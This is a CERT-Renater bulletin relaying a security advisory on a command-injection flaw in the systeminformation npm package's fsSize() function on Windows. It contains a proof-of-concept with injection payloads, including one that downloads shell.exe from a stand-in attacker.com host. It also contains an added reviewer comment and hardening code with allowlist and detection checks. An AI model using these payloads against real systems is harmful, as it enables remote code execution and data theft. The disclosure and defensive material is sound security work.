=====================================================================
CERT-Renater Note d'Information No. 2025/VULN887
_____________________________________________________________________

DATE : 19/12/2025
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running systeminformation (npm) versions prior to 5.27.14.
=====================================================================

https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch
_____________________________________________________________________

Command Injection in fsSize() on Windows
Severity: High
sebhildebrandt published GHSA-wphj-fx3q-84ch on Dec 16, 2025

Package:           systeminformation (npm)
Affected versions: <=5.27.13
Patched versions:  5.27.14

Description

Summary

The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is concatenated directly into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.

Affected Platforms: Windows only

CVSS Breakdown:
  - Attack Vector (AV:N): Network - if used in a web application/API
  - Attack Complexity (AC:H): High - requires the application to pass user input to fsSize()
  - Privileges Required (PR:N): None - no authentication required at library level
  - User Interaction (UI:N): None
  - Scope (S:U): Unchanged - executes within the Node.js process context
  - Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited

Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to fsSize(), it is not vulnerable.

Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

    if (_windows) {
      try {
        const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
        util.powerShell(cmd).then((stdout, error) => {

The drive parameter is concatenated directly into the PowerShell command string without any sanitization.

Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():

  File                Line   Function                Sanitization
  lib/processes.js    141    services()              util.sanitizeShellString(srv)
  lib/processes.js    1006   processLoad()           util.sanitizeShellString(proc)
  lib/network.js      1253   networkStats()          util.sanitizeShellString(iface)
  lib/docker.js       472    dockerContainerStats()  util.sanitizeShellString(containerIDs, true)
  lib/filesystem.js   197    fsSize()                No sanitization

The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, `, #, etc., which would prevent command injection.

PoC

Attack Scenario

An application exposes disk information via an API and passes user input to si.fsSize():

    // Vulnerable application example
    const si = require('systeminformation');
    const http = require('http');
    const url = require('url');

    http.createServer(async (req, res) => {
      const parsedUrl = url.parse(req.url, true);
      const drive = parsedUrl.query.drive; // User-controlled input

      // VULNERABLE: User input passed directly to fsSize()
      const diskInfo = await si.fsSize(drive);
      res.end(JSON.stringify(diskInfo));
    }).listen(3000);

Exploitation

Normal Request:

    GET /api/disk?drive=C:

Malicious Request (Command Injection):

    GET /api/disk?drive=C:;%20whoami%20%23

Command Construction Demonstration

The following demonstrates how commands are constructed with malicious input.

Normal usage:

    Input:   "C:"
    Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

With injection payload C:; whoami #:

    Input:   "C:; whoami #"
    Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

    (the semicolon after C: terminates the first command; the # comments out the rest of the line)

PowerShell will execute:
  1. Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C:   (original command)
  2. whoami                                                                   (injected command)
  3. Everything after # is commented out

PoC Script

    /**
     * Command Injection PoC - systeminformation fsSize()
     *
     * Run with: node poc.js
     * Requires: npm install systeminformation
     */

    const os = require('os');

    // Simulates the vulnerable command construction from filesystem.js:197
    function simulateVulnerableCommand(drive) {
      const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
      return cmd;
    }

    // Test payloads
    const payloads = [
      { name: 'Normal', input: 'C:' },
      { name: 'Command Execution', input: 'C:; whoami #' },
      { name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },
      { name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #' },
    ];

    console.log('=== Command Injection PoC ===\n');
    console.log(`Platform: ${os.platform()}`);
    console.log(`Note: Actual exploitation requires Windows\n`);

    payloads.forEach(p => {
      console.log(`[${p.name}]`);
      console.log(`  Input: ${p.input}`);
      console.log(`  Command: ${simulateVulnerableCommand(p.input)}\n`);
    });

PoC Output

    === Command Injection PoC ===

    Platform: win32
    Note: Actual exploitation requires Windows

    [Normal]
      Input: C:
      Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

    [Command Execution]
      Input: C:; whoami #
      Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

    [Data Exfiltration]
      Input: C:; Get-Process | Out-File C:\temp\procs.txt #
      Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\temp\procs.txt # | fl

    [Remote Payload]
      Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #
      Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl

As shown, the attacker's commands are injected directly into the PowerShell command string.

Impact

Who Is Affected?
  - Applications running systeminformation on Windows that pass user-controlled input to fsSize(drive)
  - Web applications, APIs, or CLI tools that accept drive letters from users
  - Monitoring dashboards that allow users to specify which drives to query

Potential Attack Scenarios
  - Remote Code Execution (RCE) - Execute arbitrary commands with Node.js process privileges
  - Data Exfiltration - Read sensitive files and exfiltrate data
  - Privilege Escalation - If Node.js runs with elevated privileges
  - Lateral Movement - Use the compromised system to attack the internal network
  - Ransomware Deployment - Download and execute malicious payloads

Recommended Fix

Apply util.sanitizeShellString() to the drive parameter, consistent with other functions in the codebase:

      if (_windows) {
        try {
    +     const driveSanitized = drive ? util.sanitizeShellString(drive, true) : '';
    -     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
    +     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`;
          util.powerShell(cmd).then((stdout, error) => {

The true parameter enables strict mode, which removes additional characters like spaces and parentheses.
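Review bot: the fix in the hunk is a character blocklist, and the second `+` line builds the filter only when `driveSanitized` is truthy, so input whose characters are all stripped silently drops the `where` clause and the call returns every drive, while input such as `C:; whoami #` is reduced to a filter that matches no caption and returns no rows instead of failing. Since a valid Win32_logicaldisk caption is a single letter followed by a colon, consider testing `drive` against `/^[A-Za-z]:$/` before building `cmd` and rejecting anything else, keeping `util.sanitizeShellString(drive, true)` as the defence-in-depth layer; the truthiness fallback and its effect on the result should at least be documented for callers.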
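The following is an added example, not code from the systeminformation project or from the advisory, showing how a call site can harden the drive parameter before an fsSize()-style command is built. It layers an allowlist check (a logical-disk caption is one letter plus a colon) on top of a blocklist strip that approximates what the advisory says util.sanitizeShellString() does; the stripped character set is an assumption taken from the advisory text, not from lib/util.js, and the function names (validateDrive, stripShellMeta, looksInjected, classify) are hypothetical. The sample inputs are the two from the advisory plus an empty filter, constructed here.

```javascript
'use strict';
// Added example: hardening the drive argument of an fsSize()-style call site.
// Not the systeminformation project's own code.

// Metacharacters the advisory lists as removed by sanitizeShellString()
// (assumption: approximated from the advisory text, not from lib/util.js).
const SHELL_META = /[;&|$`#]/g;
// Extra characters the advisory says strict mode also removes.
const STRICT_EXTRA = /[\s()]/g;

// Blocklist strip, the shape of the advisory's fix. Note that it silently
// rewrites bad input instead of rejecting it.
function stripShellMeta(input, strict = false) {
  let out = String(input).replace(SHELL_META, '');
  if (strict) out = out.replace(STRICT_EXTRA, '');
  return out;
}

// Allowlist: a Windows logical-disk caption is a single letter and a colon.
const DRIVE_RE = /^[A-Za-z]:$/;

// Returns the normalized drive letter, null when no filter was requested,
// and throws on anything that is not a plain drive specifier.
function validateDrive(input) {
  if (input === undefined || input === null || input === '') return null;
  const s = String(input);
  if (!DRIVE_RE.test(s)) {
    throw new Error(`invalid drive specifier: ${JSON.stringify(s)}`);
  }
  return s.toUpperCase();
}

// Same command template as the advisory's fix, fed only a validated value.
function buildFsSizeCommand(drive) {
  const filter = drive ? '| where -property Caption -eq ' + drive : '';
  return `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${filter} | fl`;
}

function safeFsSizeCommand(userInput) {
  return buildFsSizeCommand(validateDrive(userInput));
}

// Request-side check an API handler or a log rule can apply before the
// library is called: true when the raw value carries shell metacharacters.
function looksInjected(input) {
  return /[;&|$`#\r\n]/.test(String(input));
}

// Constructed sample inputs: the advisory's normal and injected values plus
// an empty filter.
const SAMPLES = ['C:', '', 'C:; whoami #'];

// Runs one input through the allowlist path and reports, alongside it, what
// the blocklist strip alone would have turned the input into.
function classify(input) {
  let verdict;
  try {
    safeFsSizeCommand(input);
    verdict = 'accepted';
  } catch (e) {
    verdict = 'rejected';
  }
  return {
    input,
    verdict,
    flagged: looksInjected(input),
    strippedFallback: stripShellMeta(input, true),
  };
}

for (const s of SAMPLES) {
  console.log(classify(s));
}
```

Running it shows the difference between the two layers: the allowlist rejects "C:; whoami #" with an error the caller can log, whereas the strict strip alone turns the same input into "C:whoami", a filter that matches no drive and returns no rows, so the application would see an empty result rather than a clear failure.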
References
  - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  - OWASP Command Injection
  - Node.js Security Best Practices
  - systeminformation npm package

Thank you for your work on systeminformation. I hope this report helps improve the security of the project. Please let me know if you need any additional information or clarification.

Severity: High, 8.1 / 10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   High
  Privileges required: None
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     High
  Integrity:           High
  Availability:        High
  Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID: CVE-2025-68154
Weaknesses: CWE-78
Credits: @yueyueL (Reporter)

=========================================================
+ CERT-RENATER        | tel : 01-53-94-20-44            +
+ 23/25 Rue Daviel    | fax : 01-53-94-20-41            +
+ 75013 Paris         | email: cert@support.renater.fr  +
=========================================================